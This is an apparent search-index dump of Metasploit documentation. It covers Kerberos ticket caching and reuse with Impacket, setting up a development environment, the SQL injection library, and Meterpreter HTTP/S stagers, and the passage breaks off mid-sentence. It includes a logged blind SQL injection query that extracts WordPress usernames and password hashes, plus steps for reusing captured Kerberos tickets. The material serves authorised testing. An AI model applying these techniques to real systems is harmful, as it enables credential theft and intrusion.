i.e. KRB5CCNAME=/path/to/Administrator.ccache. | KrbCacheMode – The cache storage mode to use, one of the following four options: . | none – No cache storage is used, new tickets are requested and no tickets are stored. | read-only – Stored tickets from the cache will be used, but no new tickets are stored. | write-only – New tickets are requested and they are stored for reuse. | read-write – Stored tickets from the cache will be used and new tickets will be stored for reuse. | . | ${Prefix}KrbOfferedEncryptionTypes' -- The list of encryption types presented to the KDC as being supported by the Metasploit client. i.e. SmbKrbOfferedEncryptionTypes=AES256` | . ",
    "url": "/docs/pentesting/active-directory/kerberos/service_authentication.html#service-authentication",
    "relUrl": "/docs/pentesting/active-directory/kerberos/service_authentication.html#service-authentication"
  },"783": {
    "doc": "Authenticating to SMB/WinRM/etc",
    "title": "Ticket management",
    "content": "When a write-enabled KrbCacheMode is used, tickets that are issued to Metasploit will be stored for reuse. The klist command can be used to view tickets. It is a top level command and can be run even if a module is in use. msf6 &amp;gt; klist Kerberos Cache ============== host principal sname issued status path ---- --------- ----- ------ ------ ---- 192.168.159.10 [email protected] krbtgt/[email protected] 2022-12-15 18:25:48 -0500 &amp;gt;&amp;gt;expired&amp;lt;&amp;lt; /home/smcintyre/.msf4/loot/20221215182546_default_192.168.159.10_mit.kerberos.cca_867855.bin 192.168.159.10 [email protected] cifs/[email protected] 2022-12-15 18:25:48 -0500 &amp;gt;&amp;gt;expired&amp;lt;&amp;lt; /home/smcintyre/.msf4/loot/20221215182546_default_192.168.159.10_mit.kerberos.cca_699376.bin 192.168.159.10 [email protected] krbtgt/[email protected] 2022-12-16 14:51:50 -0500 valid /home/smcintyre/.msf4/loot/20221216145149_default_192.168.159.10_mit.kerberos.cca_782487.bin 192.168.159.10 [email protected] cifs/[email protected] 2022-12-16 17:07:48 -0500 valid /home/smcintyre/.msf4/loot/20221216170747_default_192.168.159.10_mit.kerberos.cca_156303.bin 192.168.159.10 [email protected] cifs/[email protected] 2022-12-16 17:08:26 -0500 valid /home/smcintyre/.msf4/loot/20221216170825_default_192.168.159.10_mit.kerberos.cca_196712.bin 192.168.159.10 [email protected] krbtgt/[email protected] 2022-12-16 15:03:03 -0500 valid /home/smcintyre/.msf4/loot/20221216150302_default_192.168.159.10_mit.kerberos.cca_729805.bin 192.168.159.10 [email protected] krbtgt/[email protected] 2022-12-16 15:25:16 -0500 valid /home/smcintyre/.msf4/loot/20221216152515_default_192.168.159.10_mit.kerberos.cca_934698.bin . More detailed information can be displayed by using the verbose (-v / --verbose) option. msf6 &amp;gt; klist -v Kerberos Cache ============== Cache[0]: Primary Principal: [email protected] Ccache version: 4 Creds: 1 Credential[0]: Server: krbtgt/[email protected] Client: [email protected] Ticket etype: 18 (AES256) Key: 9c66cb7de8f4d3100690771a753012eafa44a3d128342939ff9230b39aeb1713 Subkey: false Ticket Length: 1090 Ticket Flags: 0x50e10000 (FORWARDABLE, PROXIABLE, RENEWABLE, INITIAL, PRE_AUTHENT, CANONICALIZE) Addresses: 0 Authdatas: 0 Times: Auth time: 2022-12-13 12:57:49 +0000 Start time: 2022-12-13 12:57:49 +0000 End time: 2022-12-13 22:57:49 +0000 Renew Till: 2022-12-14 12:57:49 +0000 Ticket: Ticket Version Number: 5 Realm: demo.local Server Name: krbtgt/demo.local Encrypted Ticket Part: Ticket etype: 18 (AES256) Key Version Number: 2 Cipher: [truncated] . The klist command can also be used for deleting tickets from the cache. ",
    "url": "/docs/pentesting/active-directory/kerberos/service_authentication.html#ticket-management",
    "relUrl": "/docs/pentesting/active-directory/kerberos/service_authentication.html#ticket-management"
  },"784": {
    "doc": "Authenticating to SMB/WinRM/etc",
    "title": "Ticket cache storage",
    "content": "Metasploit stores tickets for future use in a user configurable way as controlled by the KrbCacheMode datastore option. When a user attempts to use Kerberos to authenticate to a remote service such as SMB, if the cache mode is read-enabled (e.g. set to read-only or read-write) and Metasploit is connected to a database, it will attempt to fetch an existing ticket using the following steps targeting SMB for example purposes. | If an external ticket is specified in the ${Prefix}::Krb5Ccname option, that ticket will be used instead of the cache. | When using the cache, Metasploit will first use the datastore options, including the target host and username to search though the stored tickets for an SMB-specific Ticket Granting Service (TGS). If one is found, it will be used. Tickets that are expired will not be used. | If no TGS is found, Metasploit will repeat the search process looking for a Ticket Granting Ticket (TGT). If one is found, it will be used to contact the Key Distribution Center (KDC) and request a TGS for authentication to the SMB service. | If no TGT is found, Metasploit will contact the KDC and authenticate using the username and password from the datastore to request a TGT then an SMB-specific TGS before authenticating to the SMB service. | . If the cache mode is write-enabled (e.g. set to write-only or read-write) then any ticket, either TGT or TGS that is obtained either from the KDC or through other means, is stored for use in the cache. If the cache mode is not write-enabled, tickets will not be stored. Tickets are saved as loot, allowing them to be stored even if the database is not connected, however without the database, Metasploit can not lookup tickets for reuse as required by the read-enabled modes. Metasploit stores exactly one ticket per CCACHE file. Use a read-enabled cache mode to avoid unnecessary contact with the KDC. Use a write-enabled cache mode to store tickets for use with either Metasploit or other tools. ",
    "url": "/docs/pentesting/active-directory/kerberos/service_authentication.html#ticket-cache-storage",
    "relUrl": "/docs/pentesting/active-directory/kerberos/service_authentication.html#ticket-cache-storage"
  },"785": {
    "doc": "Authenticating to SMB/WinRM/etc",
    "title": "Using tickets with external tools",
    "content": "When a ticket (either TGT or TGS) is stored, it is saved along with the other loot Metasploit has collected. The raw CCACHE files can be viewed with the loot --type mit.kerberos.ccache command (the --type argument filters for the specified type). msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; loot --type mit.kerberos.ccache Loot ==== host service type name content info path ---- ------- ---- ---- ------- ---- ---- 192.168.159.10 mit.kerberos.ccache application/octet-stream realm: MSFLAB.LOCAL, client: smcintyre, server: krbtgt/msflab.local /home/smcintyre/.msf4/loot/20221219105440_default_192.168.159.10_mit.kerberos.cca_905330.bin 192.168.159.10 mit.kerberos.ccache application/octet-stream realm: MSFLAB.LOCAL, client: smcintyre, server: cifs/dc.msflab.local /home/smcintyre/.msf4/loot/20221219105440_default_192.168.159.10_mit.kerberos.cca_539055.bin . The path on the far right is where the CCACHE file is on disk. This path can be used with other tools such as Impacket through the KRB5CCNAME environment variable. For example: . [user@localhost]$ KRB5CCNAME=/home/smcintyre/.msf4/loot/20221219105440_default_192.168.159.10_mit.kerberos.cca_539055.bin \\ python examples/smbclient.py dc.msflab.local -target-ip 192.168.159.10 -k Impacket v0.9.22.dev1+20200327.103853.7e505892 - Copyright 2021 SecureAuth Corporation Type help for list of commands # info Version Major: 10 Version Minor: 0 Server Name: DC Server Comment: Server UserPath: c:\\ Simultaneous Users: 16777216 # . ",
    "url": "/docs/pentesting/active-directory/kerberos/service_authentication.html#using-tickets-with-external-tools",
    "relUrl": "/docs/pentesting/active-directory/kerberos/service_authentication.html#using-tickets-with-external-tools"
  },"786": {
    "doc": "Authenticating to SMB/WinRM/etc",
    "title": "Using external tickets with Metasploit",
    "content": "A ticket obtained outside of Metasploit can be used for authentication by setting the ${Prefix}::Krb5Ccname option which is prioritized over the cache. This file must be in the MIT Credential Cache (CCACHE) file format. If the ticket is in the Kirbi format, it must first be converted using the auxiliary/admin/kerberos/ticket_converter module. When an explicit CCACHE file is specified to load a ticket from, Metasploit will first attempt to load a TGS ticket from the file. If the service class of the sname component does not match the necessary value (e.g. the sname is for HOST/dc.msflab.local instead of CIFS/dc.msflab.local), the value will be patched automatically. If no TGS is found, Metasploit will attempt to load a TGT from the file and use it to contact the KDC and issue a TGS which will be stored for future use when the cache is write-enabled. It is important to set the ${Prefix}::Rhostname and ${Prefix}Domain options correctly because they are used to select the appropriate ticket from the file. ",
    "url": "/docs/pentesting/active-directory/kerberos/service_authentication.html#using-external-tickets-with-metasploit",
    "relUrl": "/docs/pentesting/active-directory/kerberos/service_authentication.html#using-external-tickets-with-metasploit"
  },"787": {
    "doc": "Authenticating to SMB/WinRM/etc",
    "title": "Authenticating to SMB/WinRM/etc",
    "content": " ",
    "url": "/docs/pentesting/active-directory/kerberos/service_authentication.html",
    "relUrl": "/docs/pentesting/active-directory/kerberos/service_authentication.html"
  },"788": {
    "doc": "Setting Up a Metasploit Development Environment",
    "title": "Assumptions",
    "content": ". | You have installed an apt-based Linux environment, such as Ubuntu or Kali. | You have created a GitHub account and associated an public ssh key with it. | You have familiarity with Git and Github, or have completed the Github bootcamp. | For optional database and REST API functionality, you will need regular user account that is not root. | . This guide has details for setting up both Linux and Windows. ",
    "url": "/docs/development/get-started/setting-up-a-metasploit-development-environment.html#assumptions",
    "relUrl": "/docs/development/get-started/setting-up-a-metasploit-development-environment.html#assumptions"
  },"789": {
    "doc": "Setting Up a Metasploit Development Environment",
    "title": "Install dependencies",
    "content": "Linux . | Open a terminal on your Linux host and set up Git, build tools, and Ruby dependencies: | . sudo apt update &amp;amp;&amp;amp; sudo apt install -y git autoconf build-essential libpcap-dev libpq-dev zlib1g-dev libsqlite3-dev . Windows . If you are running a Windows machine . | Install chocolatey | Install Ruby x64 with DevKit | Install pcaprub dependencies from your cmd.exe terminal: | . powershell -Command \"[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object System.Net.WebClient).DownloadFile('https://www.winpcap.org/install/bin/WpdPack_4_1_2.zip', 'C:\\Windows\\Temp\\WpdPack_4_1_2.zip')\" choco install 7zip 7z x \"C:\\Windows\\Temp\\WpdPack_4_1_2.zip\" -o\"C:\\\" . Install a version of PostgreSQL: . choco install postgresql12 . ",
    "url": "/docs/development/get-started/setting-up-a-metasploit-development-environment.html#install-dependencies",
    "relUrl": "/docs/development/get-started/setting-up-a-metasploit-development-environment.html#install-dependencies"
  },"790": {
    "doc": "Setting Up a Metasploit Development Environment",
    "title": "Set up your local copy of the repository",
    "content": "You will need to use Github to create a fork for your contributions and receive the latest updates from our repository. | Login to Github and click the “Fork” button in the top-right corner of the metasploit-framework repository. | Create a git directory in your home folder and clone your fork to your local machine: | . export GITHUB_USERNAME=YOUR_USERNAME_FOR_GITHUB export GITHUB_EMAIL=YOUR_EMAIL_ADDRESS_FOR_GITHUB mkdir -p ~/git cd ~/git git clone [email protected]:$GITHUB_USERNAME/metasploit-framework cd ~/git/metasploit-framework . | If you encounter a “permission denied” error on the above command, research the error message. If there isn’t an explicit reason given, confirm that your Github SSH key is configured correctly. You will need to associate your public SSH key with your GitHub account, otherwise if you set up a SSH key and don’t associate it with your GitHub account, you will receive this “permission denied” error. | To receive updates, you will create an upstream-master branch to track the Rapid7 remote repository, alongside your master branch which will point to your personal repository’s fork: | . git remote add upstream [email protected]:rapid7/metasploit-framework.git git fetch upstream git checkout -b upstream-master --track upstream/master . | Configure your Github username, email address, and username. Ensure your user.email matches the email address you registered with your Github account. | . git config --global user.name \"$GITHUB_USERNAME\" git config --global user.email \"$GITHUB_EMAIL\" git config --global github.user \"$GITHUB_USERNAME\" . | Set up msftidy to run before each git commit and after each git merge to quickly identify potential issues with your contributions: | . cd ~/git/metasploit-framework ln -sf ../../tools/dev/pre-commit-hook.rb .git/hooks/pre-commit ln -sf ../../tools/dev/pre-commit-hook.rb .git/hooks/post-merge . ",
    "url": "/docs/development/get-started/setting-up-a-metasploit-development-environment.html#set-up-your-local-copy-of-the-repository",
    "relUrl": "/docs/development/get-started/setting-up-a-metasploit-development-environment.html#set-up-your-local-copy-of-the-repository"
  },"791": {
    "doc": "Setting Up a Metasploit Development Environment",
    "title": "Install Ruby",
    "content": "Linux distributions do not ship with the latest Ruby, nor are package managers routinely updated. Additionally, if you are working with multiple Ruby projects, each one has dependencies and Ruby versions which can start to conflict. For these reasons, it is advisable to use a Ruby manager. You could just install Ruby directly (eg. sudo apt install ruby-dev), but you may likely end up with the incorrect version and no way to update. Instead, consider using one of the many different Ruby environment managers available. The Metasploit team prefers rbenv and rvm (note that rvm does require a re-login to complete). Regardless of your choice, you’ll want to make sure that, when inside the ~/git/metasploit-framework directory, you are running the correct version of Ruby: . $ cd ~/git/metasploit-framework $ cat .ruby-version 3.0.2 $ ruby -v ruby 3.0.2p107 (2021-07-07 revision 0db68f0233) [x86_64-linux] . Note: the Ruby version is likely to change over time, so don’t rely on the output in the above example. Instead, confirm your ruby -v output with the version number listed in the .ruby-version file. If the two versions don’t match, restart your terminal. If that does not work, consult the troubleshooting documentation for your Ruby environment manager. Unfortunately, troubleshooting the Ruby environment is beyond the scope of this document, but feel free to reach out for community support using the links at the bottom of this document. ",
    "url": "/docs/development/get-started/setting-up-a-metasploit-development-environment.html#install-ruby",
    "relUrl": "/docs/development/get-started/setting-up-a-metasploit-development-environment.html#install-ruby"
  },"792": {
    "doc": "Setting Up a Metasploit Development Environment",
    "title": "Install Gems",
    "content": "Before you run Metasploit, you will need to update the gems (Ruby libraries) that Metasploit depends on: . cd ~/git/metasploit-framework/ gem install bundler bundle install . If you encounter an error with the above command, refer to the bundle output and search for the error message along with the name of the gem that failed. Likely, you’ll need to apt get install a dependency that is required by that particular gem. Congratulations! You have now set up a development environment and the latest version of the Metasploit Framework. If you followed this guide step-by-step, and you ran into any problems, it would be super great if you could open a new issue so we can either help you, or, more likely, update the docs. ",
    "url": "/docs/development/get-started/setting-up-a-metasploit-development-environment.html#install-gems",
    "relUrl": "/docs/development/get-started/setting-up-a-metasploit-development-environment.html#install-gems"
  },"793": {
    "doc": "Setting Up a Metasploit Development Environment",
    "title": "Optional: Set up the REST API and PostgreSQL database",
    "content": "Installing the REST API and PostgreSQL is optional, and can be done in two ways. Recommended is to use the Docker approach, and fairly simple to do once you have docker installed on your system, Docker Desktop is recommended, but not mandatory. On Linux systems, simply having docker-cli is sufficient. Docker Installation . Make sure, you have docker available on your system: Docker Installation Guide . Note: Depending on your environment, these commands might require sudo . | Start the postgres container: | . docker run --rm -it -p 127.0.0.1:5433:5432 -e POSTGRES_PASSWORD=\"mysecretpassword\" postgres:14 . Wait till the postgres container is fully running. | Configure the Metasploit database: | . cd ~/git/metasploit-framework ./msfdb init --connection-string=\"postgres://postgres:[email protected]:5433/postgres\" . | If the msfdb init command succeeds, then confirm that the database is accessible to Metasploit: | . $ ./msfconsole -qx \"db_status; exit\" . Manual Installation . The following optional section describes how to manually install PostgreSQL and set up the Metasploit database. Alternatively, use our Omnibus installer which handles this more reliably. | Confirm that the PostgreSQL server and client are installed: | . sudo apt update &amp;amp;&amp;amp; sudo apt-get install -y postgresql postgresql-client sudo service postgresql start &amp;amp;&amp;amp; sudo update-rc.d postgresql enable . | Ensure that you are not running as the root user. | Initialize the Metasploit database: | . cd ~/git/metasploit-framework ./msfdb init . | If you receive an error about a component not being installed, confirm that the binaries shown are in your path using the which and find commands, then modifying your $PATH environment variable. If it was something else, open a new issue to let us know what happened. | If the msfdb init command succeeds, then confirm that the database is accessible to Metasploit: | . $ ./msfconsole -qx \"db_status; exit\" . Congratulations! You have now set up the Metasploit Web Service (REST API) and the backend database. ",
    "url": "/docs/development/get-started/setting-up-a-metasploit-development-environment.html#optional-set-up-the-rest-api-and-postgresql-database",
    "relUrl": "/docs/development/get-started/setting-up-a-metasploit-development-environment.html#optional-set-up-the-rest-api-and-postgresql-database"
  },"794": {
    "doc": "Setting Up a Metasploit Development Environment",
    "title": "Optional: Tips to speed up common workflows",
    "content": "The following section is optional but may improve your efficiency. Making sure you’re in the right directory to run msfconsole can become tedious, so consider using the following Bash alias: . echo 'alias msfconsole=\"pushd $HOME/git/metasploit-framework &amp;amp;&amp;amp; ./msfconsole &amp;amp;&amp;amp; popd\"' &amp;gt;&amp;gt; ~/.bash_aliases . Consider generating a GPG key to sign your commits. Read about why and how. Once you have done this, consider enabling automatic signing of all your commits with the following command: . cd *path to your cloned MSF repository on disk* git config commit.gpgsign true . Developers tend to customize their own git aliases to speed up common commands, but here are a few common ones: . [alias] # An easy, colored oneline log format that shows signed/unsigned status nicelog = log --pretty=format:'%Cred%h%Creset -%Creset %s %Cgreen(%cr) %C(bold blue)&amp;lt;%aE&amp;gt;%Creset [%G?]' # Shorthand commands to always sign (-S) and always edit the commit message. m = merge -S --no-ff --edit c = commit -S --edit # Shorthand to always blame (praise) without looking at whitespace changes b= blame -w . If you plan on working with other contributor’s pull requests, you may run the following script which makes it easier to do so: . tools/dev/add_pr_fetch.rb . After running the above script, you can checkout other pull requests more easily: . git fetch upstream git checkout fixes-to-pr-12345 upstream/pr/12345 . ",
    "url": "/docs/development/get-started/setting-up-a-metasploit-development-environment.html#optional-tips-to-speed-up-common-workflows",
    "relUrl": "/docs/development/get-started/setting-up-a-metasploit-development-environment.html#optional-tips-to-speed-up-common-workflows"
  },"795": {
    "doc": "Setting Up a Metasploit Development Environment",
    "title": "Running and writing tests",
    "content": "If you’re writing test cases (which you should), you should first configure your local database: . bundle exec rake db:create db:migrate db:seed RAILS_ENV=test . Then make sure rspec works: . bundle exec rspec . To run tests defined in file(s): . bundle exec rspec ./spec/path/to/your/tests_1.rb ./spec/path/to/your/tests_2.rb . To run the tests defined at a line number - for instance line 23: . bundle exec rspec ./spec/path/to/your/tests_1.rb:23 . Newly contributed tests should follow the conventions defined by BetterSpecs.org - with the additional requirement that all it blocks should have a human readable description. ",
    "url": "/docs/development/get-started/setting-up-a-metasploit-development-environment.html#running-and-writing-tests",
    "relUrl": "/docs/development/get-started/setting-up-a-metasploit-development-environment.html#running-and-writing-tests"
  },"796": {
    "doc": "Setting Up a Metasploit Development Environment",
    "title": "Great!  Now what?",
    "content": "We’re excited to see your upcoming contributions of new modules, documentation, and fixes! If you’re looking for inspiration, keep an eye out for newbie-friendly pull requests and issues. Please submit your new pull requests and reach out to us on Slack for community help. Finally, we welcome your feedback on this guide, so feel free to reach out to us on Slack or open a new issue. For their significant contributions to this guide, we would like to thank @kernelsmith, @corelanc0d3r, and @ffmike. ",
    "url": "/docs/development/get-started/setting-up-a-metasploit-development-environment.html#great--now-what",
    "relUrl": "/docs/development/get-started/setting-up-a-metasploit-development-environment.html#great--now-what"
  },"797": {
    "doc": "Setting Up a Metasploit Development Environment",
    "title": "Setting Up a Metasploit Development Environment",
    "content": "The shortlink to this wiki page is https://r-7.co/MSF-DEV . This is a guide for setting up a developer environment to contribute modules, documentation, and fixes to the Metasploit Framework. If you just want to use Metasploit for legal, authorized hacking, we recommend instead you: . | Install the open-source Omnibus installer, or | Use the pre-installed Metasploit on Kali Linux or Parrot Linux. | . If you want to contribute to Metasploit, start by reading our CONTRIBUTING.md, then follow the rest of this guide. ",
    "url": "/docs/development/get-started/setting-up-a-metasploit-development-environment.html",
    "relUrl": "/docs/development/get-started/setting-up-a-metasploit-development-environment.html"
  },"798": {
    "doc": "SQL Injection",
    "title": "Supported Databases",
    "content": ". | MySQL/MariaDB (#13596) | SQLite (#13847) | PostgreSQL (#14067) | . ",
    "url": "/docs/development/developing-modules/libraries/sql-injection-libraries.html#supported-databases",
    "relUrl": "/docs/development/developing-modules/libraries/sql-injection-libraries.html#supported-databases"
  },"799": {
    "doc": "SQL Injection",
    "title": "Supported Techniques",
    "content": ". | Boolean Based Blind | Time Based Blind | . | &nbsp; | MySQL/MariaDB | SQLite | Postgres | . | Boolean Based Blind | X | X | X | . | Time Based Blind | X | X | X | . ",
    "url": "/docs/development/developing-modules/libraries/sql-injection-libraries.html#supported-techniques",
    "relUrl": "/docs/development/developing-modules/libraries/sql-injection-libraries.html#supported-techniques"
  },"800": {
    "doc": "SQL Injection",
    "title": "How to use in a module",
    "content": "You’ll need to start off by including the library. include Msf::Exploit::SQLi . Next we create our SQLi object: . sqli = create_sqli(dbms: MySQLi::Common, opts: sqli_opts) do |payload| # Here is where we write in what to do each request using #{payload} as the spot to inject end . dbms can be set to either Common if the DB isn’t know, or one of the other databases and methods if it is known ahead of time such as SQLitei::BooleanBasedBlind sqli_opts is a hash containing all of the options. ",
    "url": "/docs/development/developing-modules/libraries/sql-injection-libraries.html#how-to-use-in-a-module",
    "relUrl": "/docs/development/developing-modules/libraries/sql-injection-libraries.html#how-to-use-in-a-module"
  },"801": {
    "doc": "SQL Injection",
    "title": "Notes",
    "content": "run_sql . run_sql can only return 1 column. magic_quotes bypass . CAN ONLY RETURN ONE COLUMN AT A TIME . At times, PHP will use magic_quotes to escape ' and \". This may cause problems in the SQL injection. You’ll know its a problem, because you’ll see log items like this: . [Sat Jan 02 14:11:53.103512 2021] [php7:notice] [pid 55607] [client 2.2.2.2:36475] WordPress database error You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '\\\\';\\\\',ifnull(user_login,\\\\'\\\\'),ifnull(user_pass,\\\\'\\\\')) as binary) mMJZrCxQ from w' at line 1 for query SELECT * FROM wp_chopslider3 WHERE chopslider_id =938076279 OR 1=1 AND if(length(cast((select group_concat(mMJZrCxQ) from (select cast(concat_ws(\\\\';\\\\',ifnull(user_login,\\\\'\\\\'),ifnull(user_pass,\\\\'\\\\')) as binary) mMJZrCxQ from wp_users limit 1) fWLwo) as binary))&amp;amp;1&amp;lt;&amp;gt;0,sleep(1.0),0) . However, the query was similar to this: . [*] {SQLi} Executing (select group_concat(qcO) from (select cast(concat_ws(';',to_base64(ifnull(user_login,'')),to_base64(ifnull(user_pass,''))) as binary) qcO from wp_users limit 1) dTWyw) . The query was sent without the escapes, however they were added. The solution is to avoid quotes at all. To do this, we will need to use the hex encoder . if payload.include?(\"''\") payload.gsub!(\"''\", 'hex(0x00)') end . This will convert all instances of '' which were previously being escaped to \\'\\' to hex(0x00) which does not get altered. ",
    "url": "/docs/development/developing-modules/libraries/sql-injection-libraries.html#notes",
    "relUrl": "/docs/development/developing-modules/libraries/sql-injection-libraries.html#notes"
  },"802": {
    "doc": "SQL Injection",
    "title": "SQL Injection",
    "content": "SQL Injection library support was added in 2020 by @red0xff during the Google Summer of Code. ",
    "url": "/docs/development/developing-modules/libraries/sql-injection-libraries.html",
    "relUrl": "/docs/development/developing-modules/libraries/sql-injection-libraries.html"
  },"803": {
    "doc": "Style Tips",
    "title": "Style Tips",
    "content": " ",
    "url": "/docs/development/quality/style-tips.html",
    "relUrl": "/docs/development/quality/style-tips.html"
  },"804": {
    "doc": "Style Tips",
    "title": "Editor configuration",
    "content": "Having your editor take care of formatting for you can save headaches during the acceptance process. Most Metasploit contributors use vim and/or gvim as a default text editor – if you have a configuration for some other editor, we’d love to see it! . VIM and GVIM . Adding the following settings to your .vimrc will make conforming to the CONTRIBUTING.md and msftidy.rb guidelines considerably easier. Incidentally, if you install the Janus Distribution of vim plugins, this is all done for you, and more, automatically. But, if you are a special snowflake, here’s how to limp your way to code formatting excellence. set shiftwidth=2 tabstop=2 softtabstop=2 \" textwidth affects `gq` which is handy for formatting comments set textwidth=78 \" Metasploit requires spaces instead of hard tabs set expandtab \" Highlight spaces at EOL and mixed tabs and spaces. hi BogusWhitespace ctermbg=darkgreen guibg=darkgreen match BogusWhitespace /\\s\\+$\\|^\\t\\+ \\+\\|^ \\+\\t\\+/ . If you’d rather these settings only apply to ruby files, you can use an autogroup and autocommands. if !exists(\"au_loaded\") let au_loaded = 1 augroup rb au FileType ruby set shiftwidth=2 tabstop=2 softtabstop=2 textwidth=78 au FileType ruby set expandtab au FileType ruby hi BogusWhitespace ctermbg=darkgreen guibg=darkgreen au FileType ruby match BogusWhitespace /\\s\\+$\\|^\\t\\+ \\+\\|^ \\+\\t\\+/ augroup END endif . You can also use :set list to see all whitespace as distinct characters to make it easier to see errant whitespace. Rubymine . Given the switch to using standard Ruby indentation, there is no special configuration needed for RubyMine any longer. Two-space tabs for life! . ",
    "url": "/docs/development/quality/style-tips.html#editor-configuration",
    "relUrl": "/docs/development/quality/style-tips.html#editor-configuration"
  },"805": {
    "doc": "Style Tips",
    "title": "Grammar and capitalization",
    "content": "While we understand that the world reads many, many languages, Metasploit is developed primarily in U.S English. Therefore, description grammar in modules should adhere to U.S. English conventions. Doing so not only ensures ease of use for the majority of Metasploit users, but also helps automatic (and manual) translators for other languages. Titles . Module titles should read like titles. For capitalization rules in English, see: http://owl.english.purdue.edu/owl/resource/592/01/ . The only exceptions are function names (like thisFunc()) and specific filenames (like thisfile.ocx). ",
    "url": "/docs/development/quality/style-tips.html#grammar-and-capitalization",
    "relUrl": "/docs/development/quality/style-tips.html#grammar-and-capitalization"
  },"806": {
    "doc": "The ins and outs of HTTP and HTTPS communications in Meterpreter and Metasploit Stagers",
    "title": "Windows HTTP APIs",
    "content": "The Windows API comes with two ways to talk via HTTP/S, they are WinInet and WinHTTP. The APIs are consumed in a similar fashion; many of the functions in each have the same interface, or are at least close enough to make a transition between the two rather trivial. However, there are some underlying differences that are important. The WinInet API was designed for use in desktop applications. It provides all the features required by applications to use HTTP/S while delegating much of the responsibility of handling implementation detail to the underlying API and OS. This API can result in some user interface elements appearing if not handled correctly. WinInet comes with some limitations, one of which is that it’s close to impossible to do any kind of custom validation, parsing, or handling of SSL communications. One of the needs of Metasploit users is to be able to enable a Paranoid Mode that forces Meterpreter to only talk with the appropriate endpoint. The goal is to prevent shells from being hijacked by unauthorised users. In order to do this, one of the things that was implemented was the verification of the SHA1 hash of the SSL certificate that Meterpreter reads from the server. If this hash doesn’t match the one that Meterpreter is configured with, Meterpreter will shut down. WinInet doesn’t make this process possible without a lot of custom work. For applications such as this, WinHTTP is the “preferred” option as deemed by Microsoft. This API is designed to work under a service, and provides a greater number of ways to interact with communications made over HTTP/S. With this API it was trivial to implement the SHA1 hash verification and force Meterpreter to shut down when a MITM is detected. For a full comparison of the feature differences, please see this feature matrix on MSDN. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/the-ins-and-outs-of-http-and-https-communications-in-meterpreter-and-metasploit-stagers.html#windows-http-apis",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/the-ins-and-outs-of-http-and-https-communications-in-meterpreter-and-metasploit-stagers.html#windows-http-apis"
  },"807": {
    "doc": "The ins and outs of HTTP and HTTPS communications in Meterpreter and Metasploit Stagers",
    "title": "Meterpreter’s Implementation",
    "content": "Meterpreter now makes use of WinHTTP by default so that the new features are accommodated, but unfortuanetly this doesn’t come for free. Behind the scenes, this API does not make any use of the current user’s Internet Explorer configuration settings, where the WinInet API does. This means that if the current user has a proxy configured, extra code needs to be added to make use of the current Internet Explorer settings in WinHTTP. Meterpreter has been modified to do this, however there is still one limitation that is in place. As indicated in a blog post on MSDN: . WinHTTP strictly requires HTTP/1.1 compliance for keeping the connection alive and HTTP Keep-Alives are not supported in HTTP/1.0 protocol. HTTP Keep-Alive feature was introduced in the HTTP/1.1 protocol as per RFC 2616. The server or the proxy which expects the keep-alive should also implement the protocol correctly. WinHTTP on Windows 7, Windows 2008 R2 are strict in terms of security wrto protocol compliance. The ideal solution is to change the server/proxy to use the right protocol and be RFC compliant. What this means is that from Windows 7 and onwards, the underlying WinHTTP implementation requires proper HTTP/1.1 support from any proxies that are used. If a proxy uses HTTP/1.0, such as Squid 2.7, and requires Keep-Alive support, such as NTLM authentication, then WinHTTP will refuse to talk to it. Instead of downgrading, it will expect a purely RFC-compliant implementation, and instead will return a 407 error the client. This means that for Meterpreter to work, WinHTTP can’t be used. In order to avoid this issue, extra work has been done to force Meterpreter to fall back to WinInet when this happens. Given that WinInet doesn’t do certificate hash verification, this means that the user of Meterpreter loses the ability to use paranoid mode. It was decided that Meterpreter would not fallback to WinInet if paranoid mode was enabled, as the intention of the user is clearly to avoid MITM. To sum up, Meterpreter will use WinHTTP where it can. If it can’t, it’ll fall back to WinInet unless paranoid mode is enabled. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/the-ins-and-outs-of-http-and-https-communications-in-meterpreter-and-metasploit-stagers.html#meterpreters-implementation",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/the-ins-and-outs-of-http-and-https-communications-in-meterpreter-and-metasploit-stagers.html#meterpreters-implementation"
  },"808": {
    "doc": "The ins and outs of HTTP and HTTPS communications in Meterpreter and Metasploit Stagers",
    "title": "Metasploit HTTP and HTTPS Stagers",
    "content": "Metasploit users have long since known about the reverse_http and reverse_https stagers, and have made good use of them over time. What many don’t know is that these stagers use the WinInet API, which means that they don’t get SSL certificate validation (so no paranoid mode). To provide support for paranoid mode directly inside the stager, ultimately preventing the download of Meterpreter at all in the case of MITM, new stagers were required. reverse_winhttp and reverse_winhttps are implementations of stagers that make use of WinHTTP, and in the latter case, provides support for paranoid mode. They do, however come with the same implicit limitation as Meterpreter itself in that they may not be able to provide proxy support thanks to the strict RFC compliance described in the previous section. The big difference here is that the stager does not have a fallback implementation like Meterpreter does, as this would make the stager way too big. Therefore, if an older proxy is in place that doesn’t confirm to HTTP/1.1, the stager will fail. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/the-ins-and-outs-of-http-and-https-communications-in-meterpreter-and-metasploit-stagers.html#metasploit-http-and-https-stagers",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/the-ins-and-outs-of-http-and-https-communications-in-meterpreter-and-metasploit-stagers.html#metasploit-http-and-https-stagers"
  },"809": {
    "doc": "The ins and outs of HTTP and HTTPS communications in Meterpreter and Metasploit Stagers",
    "title": "Combining Stagers with Meterpreter",
    "content": "It’s important to note that the implementations of communications inside the stagers are completely separate to those inside Meterpreter. If you use windows/meterpreter/reverse_https, then the stager will use WinInet and Meterpreter will use WinHTTP. It isn’t possible to “hand over” communications from the stager to Meterpreter in this case, and it wouldn’t make sense anyway because HTTP/S is stateless. This is the most common set up because many people don’t realise that the reverse_winhttp/s payloads exist! . Prior to the WinInet fallback work, those people hitting the HTTP/1.0 proxy issue would find themselves with the following scenario: . | They would exploit a Windows 7 (or later) target in some way, whether it be via a browser exploit, or through a social engineering attack. | The payload that was executed was meterpreter/reverse_https, and so the initial connection would come via WinInet. | WinInet would successfully use the current user’s proxy configuration and the initial connection back to Metasploit would be successful. | The stager would download the second stage (metsrv), and reflectively load it so that Meterpreter could take over. | Meterpreter would attempt to connect again to 